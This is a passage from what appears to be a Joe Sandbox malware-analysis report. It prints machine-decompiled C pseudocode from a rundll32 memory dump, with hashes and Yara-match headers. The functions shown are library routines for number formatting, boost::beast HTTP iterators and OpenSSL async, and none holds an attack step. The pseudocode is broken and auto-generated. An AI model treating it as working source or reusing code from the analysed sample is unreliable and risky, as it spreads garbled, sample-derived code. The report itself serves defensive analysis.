				void* _t209;
				char* _t210;
				char* _t211;
				char* _t212;
				char* _t213;
				unsigned int* _t216;
				void* _t219;
				intOrPtr* _t221;
				char* _t227;
				long long _t235;
				intOrPtr* _t239;
				char* _t241;

				_t171 = __rbx;
				_t139 = _t221;
				 *((long long*)(_t139 + 8)) = __rbx;
				 *((long long*)(_t139 + 0x10)) = __rbp;
				 *((long long*)(_t139 + 0x18)) = __rsi;
				 *((long long*)(_t139 + 0x20)) = __rdi;
				_push(_t235);
				r12d = 0;
				_t201 = __rdx;
				 *((intOrPtr*)(__rdx)) = r12b;
				_t216 = __rcx;
				_t174 = _t139 - 0x38;
				_t219 = __r8;
				_t86 =  <  ? r12d : _a48;
				E0000021E21EF3111664(_t139, __rbx, _t174, _a72);
				if (__r8 - _t171 + 0xb > 0) goto 0xf31280aa;
				_t62 = E0000021E21EF3118984(_t139);
				_t9 = _t235 + 0x22; // 0x22
				_t87 = _t9;
				 *_t139 = _t87;
				E0000021E21EF3111BC8(_t62);
				goto 0xf3128365;
				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0xf3128135;
				_v72 = _t235;
				_v80 = _a64;
				_t192 = _t201;
				_t143 = _a40;
				_v88 = r12b;
				_v96 = _t87;
				_v104 = _t143;
				_t65 = E0000021E21EF312839C(_t171, __rcx, _t192, __rcx, __r8);
				_t88 = _t65;
				if (_t65 == 0) goto 0xf3128103;
				 *_t201 = r12b;
				goto 0xf3128365;
				strrchr(_t241);
				if (_t143 == 0) goto 0xf3128362;
				asm("sbb dl, dl");
				 *_t143 = 0xd0;
				 *((intOrPtr*)(_t143 + 3)) = r12b;
				goto 0xf3128362;
				if (( *_t216 & 0x00000000) == 0) goto 0xf312814a;
				 *_t201 = 0x2d;
				_t202 = _t201 + 1;
				r15b = _a56;
				r10d = 0x30;
				asm("sbb edx, edx");
				if (( *_t216 & 0x00000000) != 0) goto 0xf312819d;
				 *_t202 = r10b;
				_t203 = _t202 + 1;
				asm("dec eax");
				goto 0xf31281a3;
				 *_t203 = 0x31;
				_t204 = _t203 + 1;
				_t239 = _t204;
				_t205 = _t204 + 1;
				if (_t88 != 0) goto 0xf31281b2;
				 *_t239 = r12b;
				goto 0xf31281c6;
				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
				if (( *_t216 & 0xffffffff) <= 0) goto 0xf3128259;
				r8d = r10w & 0xffffffff;
				if (_t88 <= 0) goto 0xf312820f;
				_t69 =  ~r15b + r10w;
				_t124 = _t69 - 0x39;
				if (_t124 <= 0) goto 0xf31281fd;
				_t70 = _t69 + 0xffffffff000000e7;
				 *_t205 = _t70;
				_t206 = _t205 + 1;
				r8w = r8w + 0xfffc;
				if (_t124 >= 0) goto 0xf31281dd;
				if (r8w < 0) goto 0xf3128259;
				_t96 = r8b;
				if (_t70 - 8 <= 0) goto 0xf3128259;
				_t28 = _t206 - 1; // 0x2
				_t178 = _t28;
				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0xf312823e;
				 *_t178 = r10b;
				_t179 = _t178 - 1;
				goto 0xf312822e;
				if (_t179 == _t239) goto 0xf3128256;
				_t73 =  *_t179;
				if (_t73 != 0x39) goto 0xf3128250;
				 *_t179 = 0xffffffff00000121;
				goto 0xf3128259;
				 *_t179 = _t73 + 1;
				goto 0xf3128259;
				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
				if (_t88 - 1 <= 0) goto 0xf3128274;
				_t75 = E0000021E21EF310E410(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
				r10d = 0x30;
				_t208 =  ==  ? _t239 : _t206 + _t171;
				r15b =  ~r15b;
				asm("sbb al, al");
				 *_t208 = (_t75 & 0x000000e0) + 0x70;
				if ( *_t239 - r12b < 0) goto 0xf31282a2;
				 *((char*)(_t208 + 1)) = 0x2b;
				_t209 = _t208 + 2;
				goto 0xf31282ad;
				 *((char*)(_t209 + 1)) = 0x2d;
				_t210 = _t209 + 2;
				_t184 =  ~(( *_t216 >> 0x34) - _t219);
				 *_t210 = r10b;
				_t227 = _t210;
				if (_t184 - 0x3e8 < 0) goto 0xf31282ef;
				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
				 *_t210 = __r10 + _t194;
				_t211 = _t210 + 1;
				_t185 = _t184 + _t194 * 0xfffffc18;
				if (_t211 != _t227) goto 0xf31282f5;
				if (_t185 - 0x64 < 0) goto 0xf3128323;
				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
				 *_t211 = __r10 + _t197;
				_t212 = _t211 + 1;
				if (_t212 != _t227) goto 0xf312832e;
				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0xf3128359;
				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
				_t213 = _t212 + 1;
				 *_t213 = (_t96 & 0x000007ff) + r10b;
				 *((intOrPtr*)(_t213 + 1)) = r12b;
				if (_v32 == r12b) goto 0xf3128378;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return r12d;
			}





















































                                        0x21ef312803c
                                        0x21ef312803c
                                        0x21ef312803f
                                        0x21ef3128043
                                        0x21ef3128047
                                        0x21ef312804b
                                        0x21ef312804f
                                        0x21ef3128060
                                        0x21ef3128063
                                        0x21ef3128066
                                        0x21ef3128071
                                        0x21ef3128076
                                        0x21ef312807d
                                        0x21ef3128080
                                        0x21ef3128084
                                        0x21ef3128092
                                        0x21ef3128094
                                        0x21ef3128099
                                        0x21ef3128099
                                        0x21ef312809e
                                        0x21ef31280a0
                                        0x21ef31280a5
                                        0x21ef31280bc
                                        0x21ef31280c8
                                        0x21ef31280d0
                                        0x21ef31280d4
                                        0x21ef31280d7
                                        0x21ef31280e2
                                        0x21ef31280e7
                                        0x21ef31280eb
                                        0x21ef31280f0
                                        0x21ef31280f5
                                        0x21ef31280f9
                                        0x21ef31280fb
                                        0x21ef31280fe
                                        0x21ef312810b
                                        0x21ef3128113
                                        0x21ef3128122
                                        0x21ef312812a
                                        0x21ef312812c
                                        0x21ef3128130
                                        0x21ef3128142
                                        0x21ef3128144
                                        0x21ef3128147
                                        0x21ef312814a
                                        0x21ef312815a
                                        0x21ef3128176
                                        0x21ef3128181
                                        0x21ef3128183
                                        0x21ef3128186
                                        0x21ef3128192
                                        0x21ef312819b
                                        0x21ef312819d
                                        0x21ef31281a0
                                        0x21ef31281a3
                                        0x21ef31281a6
                                        0x21ef31281ab
                                        0x21ef31281ad
                                        0x21ef31281b0
                                        0x21ef31281c3
                                        0x21ef31281c9
                                        0x21ef31281cf
                                        0x21ef31281df
                                        0x21ef31281f0
                                        0x21ef31281f4
                                        0x21ef31281f8
                                        0x21ef31281fa
                                        0x21ef31281fd
                                        0x21ef3128201
                                        0x21ef3128208
                                        0x21ef312820d
                                        0x21ef3128213
                                        0x21ef3128218
                                        0x21ef3128228
                                        0x21ef312822a
                                        0x21ef312822a
                                        0x21ef3128234
                                        0x21ef3128236
                                        0x21ef3128239
                                        0x21ef312823c
                                        0x21ef3128241
                                        0x21ef3128243
                                        0x21ef3128247
                                        0x21ef312824c
                                        0x21ef312824e
                                        0x21ef3128252
                                        0x21ef3128254
                                        0x21ef3128256
                                        0x21ef312825b
                                        0x21ef3128266
                                        0x21ef312826e
                                        0x21ef3128277
                                        0x21ef312827b
                                        0x21ef312827e
                                        0x21ef3128284
                                        0x21ef3128296
                                        0x21ef3128298
                                        0x21ef312829c
                                        0x21ef31282a0
                                        0x21ef31282a2
                                        0x21ef31282a6
                                        0x21ef31282aa
                                        0x21ef31282ad
                                        0x21ef31282b0
                                        0x21ef31282ba
                                        0x21ef31282d4
                                        0x21ef31282db
                                        0x21ef31282dd
                                        0x21ef31282e7
                                        0x21ef31282ed
                                        0x21ef31282f3
                                        0x21ef3128310
                                        0x21ef3128317
                                        0x21ef3128319
                                        0x21ef3128326
                                        0x21ef312832c
                                        0x21ef312834d
                                        0x21ef312834f
                                        0x21ef312835c
                                        0x21ef312835e
                                        0x21ef312836a
                                        0x21ef3128371
                                        0x21ef3128398

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: gfffffff
                                        • API String ID: 3215553584-1523873471
                                        • Opcode ID: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction ID: 4761c6af7c169f0aeb8357f8bac61568eec27ed485d179e0ab8e924984c37fe5
                                        • Opcode Fuzzy Hash: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction Fuzzy Hash: E79123726057858AEF258F29AD483EEABE5A775BD0F058121CF9907BE6DA3CC512C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF31141F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction ID: 4a4f71a229b307fc5ef9699db68bd5ed0f4099d6a96bcde2beefc102a36d2fcd
                                        • Opcode Fuzzy Hash: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction Fuzzy Hash: 03718F72114660C6EF64AF2488482EE3BF8F365F48F661116DE4643A9ADF38CCA3D744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3113CF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction ID: 7a1867b82f4c8fcfb9814516a30012dee0d7c297b372d6454530536421b50dd0
                                        • Opcode Fuzzy Hash: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction Fuzzy Hash: 7771907210525186EF78AF28C84C2EE7BF9F325F18F16151ADE4682A9ED739CC92C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300BB60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF300BB60(intOrPtr* __rcx, void* __rdx, void* __r8, void* __r10) {
				signed int _t22;
				intOrPtr* _t39;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t51;

				_t46 = __r8;
				_t22 =  *(__rcx + 0x10) & 0x000000ff;
				if (_t22 != 1) goto 0xf300bb86;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x48) goto 0xf300bc2c;
				goto 0xf300eb20;
				if (_t22 != 2) goto 0xf300bba5;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x38) goto 0xf300bc2c;
				goto 0xf300fdc0;
				if (_t22 != 3) goto 0xf300bc27;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				_t51 =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 8)) != _t51 + 0x28) goto 0xf300bc2c;
				_t43 =  *((intOrPtr*)(_t51 + 0x10));
				r10d = 0;
				_t39 =  *((intOrPtr*)(_t51 + 8));
				if (_t39 == _t43) goto 0xf300bc0a;
				_t14 = _t39 + 0x32; // 0xccccc35fe38b4928
				r8d =  *_t14 & 0x0000ffff;
				_t16 = _t46 + 2; // 0xccccc35fe38b492a
				if ( *_t39 != _t43) goto 0xf300bbd0;
				if (_t16 + __rdx + __r10 == 0) goto 0xf300bc0a;
				if ( *(__rcx + 0x10) == 0) goto 0xf300bc00;
				 *(__rcx + 0x10) = 0;
				 *((long long*)(__rcx + 8)) =  *((intOrPtr*)(_t51 + 8));
				 *(__rcx + 0x10) = 4;
				return _t22;
			}








                                        0x21ef300bb60
                                        0x21ef300bb60
                                        0x21ef300bb69
                                        0x21ef300bb6b
                                        0x21ef300bb7b
                                        0x21ef300bb81
                                        0x21ef300bb88
                                        0x21ef300bb8a
                                        0x21ef300bb9a
                                        0x21ef300bba0
                                        0x21ef300bba7
                                        0x21ef300bbad
                                        0x21ef300bbb2
                                        0x21ef300bbbd
                                        0x21ef300bbbf
                                        0x21ef300bbc3
                                        0x21ef300bbc6
                                        0x21ef300bbcd
                                        0x21ef300bbd0
                                        0x21ef300bbd0
                                        0x21ef300bbdf
                                        0x21ef300bbe9
                                        0x21ef300bbee
                                        0x21ef300bbf9
                                        0x21ef300bbfb
                                        0x21ef300bc00
                                        0x21ef300bc04
                                        0x21ef300bc09

                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3011F0C
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun, xrefs: 0000021EF3011F3F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun
                                        • API String ID: 0-301515690
                                        • Opcode ID: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction ID: b2dd9691aec76b99fa569ef3c6ed3491dbd79f8a3ea8ee68b69009952dcf3f20
                                        • Opcode Fuzzy Hash: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction Fuzzy Hash: 9E71E373106BD496EFA48718D84839A3BE1F365B48FA68516CE9C037A1DB7DC587C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302B8B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 55%
                                        			E0000021E21EF302B8B0(void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rbp;
				void* _t4;
				void* _t12;
				void* _t18;
				void* _t19;

				E0000021E21EF310C220();
				_t19 = __r9;
				if (E0000021E21EF3025C70(__rax, _t12, __rcx, __rdx) == 0) goto 0xf302b8f6;
				E0000021E21EF3024EB0(0xf3208fd4);
				if (__rax != 0) goto 0xf302b910;
				_t4 = E0000021E21EF302BB50(__rax, 0xf3208fd4, _t18, _t19);
				if (__rax != 0) goto 0xf302b910;
				return _t4;
			}









                                        0x21ef302b8be
                                        0x21ef302b8d3
                                        0x21ef302b8e0
                                        0x21ef302b8e9
                                        0x21ef302b8f4
                                        0x21ef302b8f6
                                        0x21ef302b901
                                        0x21ef302b90f

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FiberSwitch
                                        • String ID: ..\..\openssl-1.1.0f\crypto\async\async.c
                                        • API String ID: 812016776-2190089840
                                        • Opcode ID: 4c29dc2dd828e81f484f439790ab6165f024a83e594b583a3deaee1881d45524
                                        • Instruction ID: da1ba6237e64cebf571ee28ceb83e9db90b20701bf0d551705993cd157c9ebc5
                                        • Opcode Fuzzy Hash: 4c29dc2dd828e81f484f439790ab6165f024a83e594b583a3deaee1881d45524
                                        • Instruction Fuzzy Hash: 3E515976201B0882EF24DF26E8483AB77A1F7A4B88F120416DE4C47BA9DF3CC566C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF312846C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF312846C(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				void* _t13;
				intOrPtr* _t21;
				intOrPtr* _t35;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t21 > 0) goto 0xf31284d1;
				_t13 = E0000021E21EF3118984(_t21);
				 *_t21 = 0x22;
				E0000021E21EF3111BC8(_t13);
				return 0x22;
			}







                                        0x21ef312846c
                                        0x21ef312846f
                                        0x21ef3128473
                                        0x21ef3128477
                                        0x21ef312847b
                                        0x21ef312848d
                                        0x21ef3128496
                                        0x21ef3128499
                                        0x21ef31284a1
                                        0x21ef31284a3
                                        0x21ef31284ad
                                        0x21ef31284af
                                        0x21ef31284d0

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: e+000$gfff
                                        • API String ID: 3215553584-3030954782
                                        • Opcode ID: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction ID: 6f8a4d5ba7f15ff0ddd67ad695f2a70655fe0fb7246b5cb39452e5a19b146f26
                                        • Opcode Fuzzy Hash: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction Fuzzy Hash: B95107727147C48AEB358F39AD453DEABE1E3A1B90F099225DE9847FD6DA2CC446C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300BC30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0000021E21EF300BC30(intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				long long _v56;
				void* __rdi;
				long long _t115;
				intOrPtr _t121;
				long long _t122;
				intOrPtr* _t130;
				void* _t137;
				void* _t138;

				_a16 = __rdx;
				_v56 = 0xfffffffe;
				_a8 = __rbx;
				_a24 = __rsi;
				if (( *(__rcx + 0x20) & 0x000000ff) != 1) goto 0xf300bd61;
				0xf3008c60();
				_t130 = __rax;
				_t115 = __rcx + 8;
				E0000021E21EF300BB60(_t115,  *__rcx + 0x10, _t137, _t138);
				if ( *_t115 ==  *_t130) goto 0xf300bc88;
				goto 0xf300bcf0;
				if (0 ==  *((intOrPtr*)(_t130 + 0x10))) goto 0xf300bc95;
				goto 0xf300bcf0;
				if (0 == 0) goto 0xf300bcee;
				if (0 != 1) goto 0xf300bcaa;
				goto 0xf300bcf0;
				if (0 != 2) goto 0xf300bcbb;
				goto 0xf300bcf0;
				if (0 != 3) goto 0xf300bccc;
				goto 0xf300bcf0;
				if (0 != 4) goto 0xf300bcdd;
				goto 0xf300bcf0;
				if (0 != 5) goto 0xf300bcee;
				goto 0xf300bcf0;
				_v16 = 0;
				if (1 == 0) goto 0xf300bdff;
				_t121 =  *__rcx;
				asm("movups xmm1, [ecx]");
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				if ( *((intOrPtr*)(_t130 + 8)) == 0) goto 0xf300bd3d;
				if (1 == 0) goto 0xf300bd31;
				if (1 != 1) goto 0xf300bd2d;
				_a16 = _t115;
				if ( *((char*)(_t115 + 0x10)) == 0) goto 0xf300bd2d;
				 *((char*)(_t115 + 0x10)) = 0;
				 *((char*)(_t115 + 0x18)) = 0;
				 *_t115 = _t121;
				 *((char*)(_t115 + 0x18)) = 2;
				goto 0xf300bdff;
				if (1 == 0) goto 0xf300bd58;
				if (1 != 1) goto 0xf300bd54;
				_a16 = _t115;
				if ( *((char*)(_t115 + 0x10)) == 0) goto 0xf300bd54;
				 *((char*)(_t115 + 0x10)) = 0;
				 *((char*)(_t115 + 0x18)) = 0;
				 *((char*)(_t115 + 0x18)) = 3;
				goto 0xf300bdff;
				if (1 != 2) goto 0xf300bda2;
				_t122 = _t121 + 8;
				 *_t122 =  *_t122 + 0x10;
				if ( *_t122 !=  *__rcx + 0x10) goto 0xf300bdff;
				if (1 == 0) goto 0xf300bd9c;
				if (( *(_t122 + 0x18) & 0x000000ff) != 1) goto 0xf300bd98;
				_a16 = _t122;
				if ( *((char*)(_t122 + 0x10)) == 0) goto 0xf300bd98;
				 *((char*)(_t122 + 0x10)) = 0;
				 *(_t122 + 0x18) = 0;
				 *(_t122 + 0x18) = 3;
				goto 0xf300bdff;
				_v32 = 0xf319d200;
				_v24 = 0xf319d200;
				_v16 = 0xf319d200;
				_v48 = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t115,  &_v48,  &_v24, _t130, __rcx);
				_v32 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t115,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::asio::const_buffer>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,2> &)", _t130);
			}
















                                        0x21ef300bc30
                                        0x21ef300bc3a
                                        0x21ef300bc43
                                        0x21ef300bc48
                                        0x21ef300bc56
                                        0x21ef300bc68
                                        0x21ef300bc6d
                                        0x21ef300bc70
                                        0x21ef300bc77
                                        0x21ef300bc82
                                        0x21ef300bc86
                                        0x21ef300bc8f
                                        0x21ef300bc93
                                        0x21ef300bc97
                                        0x21ef300bc9b
                                        0x21ef300bca8
                                        0x21ef300bcac
                                        0x21ef300bcb9
                                        0x21ef300bcbd
                                        0x21ef300bcca
                                        0x21ef300bcce
                                        0x21ef300bcdb
                                        0x21ef300bcdf
                                        0x21ef300bcec
                                        0x21ef300bcf0
                                        0x21ef300bcf7
                                        0x21ef300bcfd
                                        0x21ef300bd00
                                        0x21ef300bd03
                                        0x21ef300bd08
                                        0x21ef300bd14
                                        0x21ef300bd18
                                        0x21ef300bd1c
                                        0x21ef300bd1e
                                        0x21ef300bd27
                                        0x21ef300bd29
                                        0x21ef300bd2d
                                        0x21ef300bd31
                                        0x21ef300bd34
                                        0x21ef300bd38
                                        0x21ef300bd3f
                                        0x21ef300bd43
                                        0x21ef300bd45
                                        0x21ef300bd4e
                                        0x21ef300bd50
                                        0x21ef300bd54
                                        0x21ef300bd58
                                        0x21ef300bd5c
                                        0x21ef300bd63
                                        0x21ef300bd65
                                        0x21ef300bd69
                                        0x21ef300bd77
                                        0x21ef300bd83
                                        0x21ef300bd87
                                        0x21ef300bd89
                                        0x21ef300bd92
                                        0x21ef300bd94
                                        0x21ef300bd98
                                        0x21ef300bd9c
                                        0x21ef300bda0
                                        0x21ef300bda9
                                        0x21ef300bdb0
                                        0x21ef300bdb5
                                        0x21ef300bdc1
                                        0x21ef300bdc6
                                        0x21ef300bdd5
                                        0x21ef300bde2
                                        0x21ef300bde7
                                        0x21ef300be0e

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300BDBA
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF300BDED
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 592178966-3009069526
                                        • Opcode ID: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction ID: 869d02d1ba38b5dda3060f9c7bac2a628ff777e88543fe67b658c9693418b773
                                        • Opcode Fuzzy Hash: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction Fuzzy Hash: 3951D472009B8481EF608F29D8483AA67A3E7B1B48F554123DEEA07B99DF3DC593C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300BEF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0000021E21EF300BEF0(intOrPtr* __rcx) {
				signed int _t10;
				void* _t16;
				intOrPtr _t18;

				_t10 =  *(__rcx + 0x10) & 0x000000ff;
				if (_t10 != 1) goto 0xf300bf3c;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				_t18 =  *__rcx;
				_t16 =  *((intOrPtr*)(_t18 + 0x30)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) != _t16) goto 0xf300bfcd;
				asm("movups xmm1, [edx+0x20]");
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				if (_t16 == 0) goto 0xf300bf52;
				if ( *(__rcx + 0x10) == 0) goto 0xf300bf33;
				 *(__rcx + 0x10) = 0;
				 *((long long*)(__rcx + 8)) = _t18 + 0x20;
				 *(__rcx + 0x10) = 2;
				return _t10;
			}






                                        0x21ef300bef0
                                        0x21ef300bef6
                                        0x21ef300bef8
                                        0x21ef300befd
                                        0x21ef300bf04
                                        0x21ef300bf0c
                                        0x21ef300bf12
                                        0x21ef300bf1a
                                        0x21ef300bf1f
                                        0x21ef300bf27
                                        0x21ef300bf2d
                                        0x21ef300bf2f
                                        0x21ef300bf33
                                        0x21ef300bf37
                                        0x21ef300bf3b

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF30120E7
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con, xrefs: 0000021EF301211A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con
                                        • API String ID: 1552479455-1729322650
                                        • Opcode ID: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction ID: 34df1d45a07eb9c91c494a355a0ef0912d828106c8a9360120245b3bb1a7e6f2
                                        • Opcode Fuzzy Hash: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction Fuzzy Hash: 8A51B172105B8485EF21871CC8483DA3BE5F365B0CFB58616DE9D06AA2EB6EC587C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

